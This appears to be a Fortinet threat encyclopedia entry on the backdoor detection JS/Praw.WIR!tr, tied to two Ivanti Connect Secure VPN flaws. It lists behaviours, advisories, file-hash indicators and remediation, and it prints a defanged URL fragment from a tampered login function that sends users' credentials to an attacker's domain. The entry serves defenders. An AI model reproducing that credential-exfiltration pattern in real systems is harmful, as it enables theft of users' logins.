JS/Praw.WIR!tr
Analysis
JS/Praw.WIR!tr is a generic detection for a backdoor trojan.
Since this is a generic detection, this malware may have varying behaviour.
Below are some of its observed characteristics/behaviours:
- This malware is related to the exploitation of two vulnerabilities, CVE-2023-46805 and CVE-2024-21887 targeting Ivanti Connect Secure VPN.
- Remote code execution (RCE) and unauthenticated command execution can be achieved upon successful exploitation.
- The "Login" function is modified to POST the user's credentials to an attacker-controlled domain. An example of the request URL is shown below:
  - hxxps://[REMOVED].fr/IMG/xml.php?a=" + a +"&b="+ b+"&c="+c
- This malware has been associated with the following third-party articles/advisories:
  - https://nvd.nist.gov/vuln/detail/CVE-2023-46805
  - https://nvd.nist.gov/vuln/detail/CVE-2024-21887
- The following file hashes are IOCs associated with this detection:
  - MD5: 2ec505088b942c234f39a37188e80d7a
    SHA256: d4de1b866f94cdc43e55fab932880da1f4e9c7406bb17926e30baa9b7b824ecb
  - MD5: e8489983d73ed30a4240a14b1f161254
    SHA256: e1d0ccfb7f1c46c7b8b8b154c97bac33f3ba89dae6481464cbe1448aca1e9dea
Recommended Action
- Make sure that your FortiGate/FortiClient system is using the latest AV database.
- Quarantine/delete files that are detected and replace infected files with clean backup copies.
Telemetry
Detection Availability
Product | Availability
---|---
FortiGate |
Extended |
FortiClient |
FortiMail |
FortiSandbox |
FortiWeb |
Web Application Firewall |
FortiIsolator |
FortiDeceptor |
FortiEDR |